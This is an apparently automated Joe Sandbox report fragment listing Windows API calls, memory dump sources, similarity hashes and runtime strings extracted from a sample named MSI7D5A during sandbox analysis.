                                                      • MoveFileW.KERNEL32(?,00000000), ref: 00A4354A
                                                      • DeleteFileW.KERNEL32(?), ref: 00A43592
                                                        • Part of subcall function 00A41A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00A41AF7
                                                        • Part of subcall function 00A41A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00A41B7D
                                                        • Part of subcall function 00A42E60: LocalFree.KERNEL32(?,838A949E,?,?,00A83C40,000000FF,?,00A41242,838A949E,?,?,00A83C75,000000FF), ref: 00A42EB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                      • String ID: URL$url
                                                      • API String ID: 853893950-346267919
                                                      • Opcode ID: 6d5688ac375d0f788492bb3b4137b4f037abd3af30f09c838c0d7aee574cceb3
                                                      • Instruction ID: 364caf31f147e5d367300241446ac5f308442ce55afffbde76237cbdde242a6b
                                                      • Opcode Fuzzy Hash: 6d5688ac375d0f788492bb3b4137b4f037abd3af30f09c838c0d7aee574cceb3
                                                      • Instruction Fuzzy Hash: B2C16774D142689ADF24DF28CD987DDBBB4BF94304F5042D9E009A7291EBB46B88CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00A43735
                                                      • GetLastError.KERNEL32(?,?,?,00A84215,000000FF), ref: 00A4381A
                                                        • Part of subcall function 00A42310: GetProcessHeap.KERNEL32 ref: 00A42365
                                                        • Part of subcall function 00A446F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00A43778,-00000010,?,?,?,00A84215,000000FF), ref: 00A44736
                                                      • _wcschr.LIBVCRUNTIME ref: 00A437C6
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00A84215,000000FF), ref: 00A437DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                      • String ID: ntdll.dll
                                                      • API String ID: 3941625479-2227199552
                                                      • Opcode ID: 29f46e76dc534d7bdc9f43a1263e9d0c20427f292dc66f4a6b05d057ccec0180
                                                      • Instruction ID: e6757594512f5d3f65e63340730b6628f134e5eab856503410bc8d4125d3224c
                                                      • Opcode Fuzzy Hash: 29f46e76dc534d7bdc9f43a1263e9d0c20427f292dc66f4a6b05d057ccec0180
                                                      • Instruction Fuzzy Hash: 50417175A00605AFDF10DFA8DD45BAEB7F4FF54310F144629E92697281EBB0AA04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A41A20: LocalFree.KERNEL32(?), ref: 00A41A42
                                                        • Part of subcall function 00A63E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A41434,?,?,00A4D341,00A41434,00A98B5C,?,00A41434,?,00000000), ref: 00A63EBA
                                                      • GetCurrentProcess.KERNEL32(838A949E,838A949E,?,?,00000000,00A84981,000000FF), ref: 00A462EB
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00A462B0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A462B7
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                      • String ID: IsWow64Process$kernel32
                                                      • API String ID: 1333104975-3789238822
                                                      • Opcode ID: 8dd8cbf1cc2d10d222a06e8352ef78d575671e5690eec9bef18ab35b05516328
                                                      • Instruction ID: 920e5deaaaeccd5077477f0495174b23e0e0d821abb4e750f2942d0e602b5b3e
                                                      • Opcode Fuzzy Hash: 8dd8cbf1cc2d10d222a06e8352ef78d575671e5690eec9bef18ab35b05516328
                                                      • Instruction Fuzzy Hash: F7210272E48605EFCB10DFE4DE06B9DB7B8FB18B10F100626F911932D0EB7569018B62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 2204710431-1686923651
                                                      • Opcode ID: 91ff4b8dac4bfdbe682a36dfd646e3dda8c44515bb041326b0704095ead49d21
                                                      • Instruction ID: f79a2aeda54fcd0fe0ea0af34b0322004bc25bf2d165dd1418341e7a0079d6ae
                                                      • Opcode Fuzzy Hash: 91ff4b8dac4bfdbe682a36dfd646e3dda8c44515bb041326b0704095ead49d21
                                                      • Instruction Fuzzy Hash: 332186B1904B926EDB65DF74C49077BBEF8BB08311F04455AE859C7A42D734EA05CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(838A949E,838A949E,?,?,00000000,00A84981,000000FF), ref: 00A462EB
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00A462B0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A462B7
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                      • String ID: IsWow64Process$kernel32
                                                      • API String ID: 2056477612-3789238822
                                                      • Opcode ID: cef59f3279d52b5b6b23ba6a8725b96718963e79f243b81ddae809921edabc30
                                                      • Instruction ID: 4ad51937ca819d445798e9d6f2f0d3c4423f6f3aac5d5756d44d9904656075a3
                                                      • Opcode Fuzzy Hash: cef59f3279d52b5b6b23ba6a8725b96718963e79f243b81ddae809921edabc30
                                                      • Instruction Fuzzy Hash: 9E11BEB2E48754EFCB10CFA4DD06B9AB7B8F719B20F14066AE911936D0EB75A900CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A66AA3,?,?,00A9DDCC,00000000,?,00A66BCE,00000004,InitializeCriticalSectionEx,00A897E8,InitializeCriticalSectionEx,00000000), ref: 00A66A72
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: faa8686a87e2c8ad24248ac65e68b55acc9e5e08956f3c8bb4bc0d175f60707d
                                                      • Instruction ID: c74706eb58cc3be1378ae81ebe08f4935bd1480812cf5616cca1a14528c1fec7
                                                      • Opcode Fuzzy Hash: faa8686a87e2c8ad24248ac65e68b55acc9e5e08956f3c8bb4bc0d175f60707d
                                                      • Instruction Fuzzy Hash: 49117332A45225ABDB22DBE89C45B5E37B49F217B0F254260FA15FB280D770ED0187D5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,838A949E,?,?,00000000,00A86A6C,000000FF,?,00A72DC1,?,?,00A72D95,?), ref: 00A72E23
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A72E35
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00A86A6C,000000FF,?,00A72DC1,?,?,00A72D95,?), ref: 00A72E57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 12a644c8f286cac4f0b0034a8a5e438984d22cc385e153381167e53c5a09bed4
                                                      • Instruction ID: 462adf364d229062a35f35deaa9c0f286f35eae4a3def57395b2c357896df42e
                                                      • Opcode Fuzzy Hash: 12a644c8f286cac4f0b0034a8a5e438984d22cc385e153381167e53c5a09bed4
                                                      • Instruction Fuzzy Hash: 6601A731958619BFDB129F80CC09FAEBBB8FB04B10F004625F911A26A0DB74D901CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00A76E40
                                                      • __alloca_probe_16.LIBCMT ref: 00A76F01
                                                      • __freea.LIBCMT ref: 00A76F68
                                                        • Part of subcall function 00A75BDC: HeapAlloc.KERNEL32(00000000,00000000,00A73841,?,00A7543A,?,00000000,?,00A66CE7,00000000,00A73841,00000000,?,?,?,00A7363B), ref: 00A75C0E
                                                      • __freea.LIBCMT ref: 00A76F7D
                                                      • __freea.LIBCMT ref: 00A76F8D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                      • String ID:
                                                      • API String ID: 1096550386-0
                                                      • Opcode ID: ec5a7c67f22e8a091d6fd1ff01c0708c65b94495a40399417765bfb0b7651247
                                                      • Instruction ID: f74f19544031888e3889e8c775110fa1b7dd97b6218cb589227525edb58d6592
                                                      • Opcode Fuzzy Hash: ec5a7c67f22e8a091d6fd1ff01c0708c65b94495a40399417765bfb0b7651247
                                                      • Instruction Fuzzy Hash: F7517F72600A06AFEB219FA4DD41FBF7AA9EF44750B15C569FD0CDA251EB31DC108BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B8DD
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B900
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B928
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B98D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B9B7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: 6dfc444edf346c4b4b724e8e49812e818110185014a3a8368c963b6b0e603d49
                                                      • Instruction ID: fef3375ade57f15146bab1d0945625e8de7f4ed3796db277e86c9d28d867871a
                                                      • Opcode Fuzzy Hash: 6dfc444edf346c4b4b724e8e49812e818110185014a3a8368c963b6b0e603d49
                                                      • Instruction Fuzzy Hash: 42313735A00214EFCB10CF94D940BAEBBB4FF64320F24415AEA04673A2DB71ED06CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,?,75474450,00A45646,?,?,?,?,?), ref: 00A45898
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                      • API String ID: 1452528299-1782174991
                                                      • Opcode ID: 251a52e510a43f4afbe24d8f6a400ab9edba5d5351e579d47052bbb08769463a
                                                      • Instruction ID: 5d21c2d010290edfe43cbb313d9ce73c860cde2a285aef8d53f781080339583d
                                                      • Opcode Fuzzy Hash: 251a52e510a43f4afbe24d8f6a400ab9edba5d5351e579d47052bbb08769463a
                                                      • Instruction Fuzzy Hash: 90118E5AF10621C7DF301F7C980136AA2E4DF91754F65187FE889DB392EAB58C818395
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Maklocstr$Maklocchr
                                                      • String ID:
                                                      • API String ID: 2020259771-0
                                                      • Opcode ID: d8bce6abefcf3e6453d2bc66481eb7faf9ae5f838a69eb91492ed0e49494a17d
                                                      • Instruction ID: 8f33c79c197f799ff4f5cbe5e930459f18400ad002a48d6def15151b07dd58c6
                                                      • Opcode Fuzzy Hash: d8bce6abefcf3e6453d2bc66481eb7faf9ae5f838a69eb91492ed0e49494a17d
                                                      • Instruction Fuzzy Hash: 44118CB1A40784BBE720DBA48882F32B7ECBF05352F080519FA458BA41D275FC5887A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D883
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D88D
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A4D8C7
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D8DE
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D8FE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                      • String ID:
                                                      • API String ID: 743221004-0
                                                      • Opcode ID: 006fcc61b45bb362ebd0e4044e7db12d33b597776c6652aa7d2486f972019455
                                                      • Instruction ID: 9cb0a42b390115c07de7c77c7030703e56cf7f4a063177296ff6fd136ca6a9f5
                                                      • Opcode Fuzzy Hash: 006fcc61b45bb362ebd0e4044e7db12d33b597776c6652aa7d2486f972019455
                                                      • Instruction Fuzzy Hash: 8911CB3AA0021A9FCF04EBA0DA51ABE77B1BFD4710F240409E811AB291CF749E068B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52301
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5230B
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A52345
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5235C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5237C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: 88c3f86fee4bedb465f596ef7350b9a78c0da176ef9086e2d11902414ce66cf8
                                                      • Instruction ID: a4dbd9d36bb8e73acea0fd1e751755e9fd6aa6f629b80514752b0fedd3e94f36
                                                      • Opcode Fuzzy Hash: 88c3f86fee4bedb465f596ef7350b9a78c0da176ef9086e2d11902414ce66cf8
                                                      • Instruction Fuzzy Hash: 2301C0369001159BCF14FBA4E941AAEB7B1BF80721F240509F810AB291DF789E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52396
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A523A0
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A523DA
                                                      • std::_Facet_Register.LIBCPMT ref: 00A523F1
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52411
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: 64bb39e3c4a33c1789afc658c98b929b0690ca6eacb607fdaa53183eea2699fa
                                                      • Instruction ID: f44be8c2724f43eeedd785ae82e9cc872cff3c40e88fefad06a89747701cd4d1
                                                      • Opcode Fuzzy Hash: 64bb39e3c4a33c1789afc658c98b929b0690ca6eacb607fdaa53183eea2699fa
                                                      • Instruction Fuzzy Hash: 8201C036A001199FCB14FBA49A41BBE77B1BF80721F244809F8106B291DF789E4ACB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A524C0
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A524CA
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A52504
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5251B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5253B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0
                                                      • Opcode ID: b263423e231c32584e7ecac3e320f7c18e853e955683ea4cc824db31c7b6d54f
                                                      • Instruction ID: 66de4997e4ef8484f523c7d656b0f374e2ab87c8eb0953e8867c9f3832e6ac52
                                                      • Opcode Fuzzy Hash: b263423e231c32584e7ecac3e320f7c18e853e955683ea4cc824db31c7b6d54f
                                                      • Instruction Fuzzy Hash: 3F01D236900115DBCB15FBA4E955AAEB7B1BF94721F240409F81067391DF789E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5242B
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52435
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A5246F
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52486
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A524A6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
